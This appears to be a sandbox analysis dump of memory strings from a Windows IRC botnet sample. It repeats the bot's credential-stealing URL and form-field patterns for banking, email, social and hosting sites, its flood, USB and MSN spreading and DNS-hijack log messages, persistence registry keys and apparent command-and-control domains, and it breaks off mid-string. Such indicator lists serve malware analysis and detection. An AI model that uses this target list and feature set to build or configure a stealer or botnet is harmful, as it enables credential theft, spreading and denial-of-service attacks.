%6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>notepad.exe_3436_rwx_008B0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\notepad.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>hsadjku.exe_972:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>KERNEL32.dll</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>b.fjwhwproxiesfwhj123.com</pre><pre>ws2_32.dll</pre><pre>advapi32.dll</pre><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-2266654\</pre><pre>876668j1.exe</pre><pre>C:\RECYCLER</pre><pre>Desktop.ini</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>explorer.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><b>hsadjku.exe_972_rwx_00400000_00005000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>KERNEL32.dll</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>b.fjwhwproxiesfwhj123.com</pre><pre>ws2_32.dll</pre><pre>advapi32.dll</pre><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-2266654\</pre><pre>876668j1.exe</pre><pre>C:\RECYCLER</pre><pre>Desktop.ini</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>explorer.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><b>hsadjku.exe_972_rwx_008B0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pr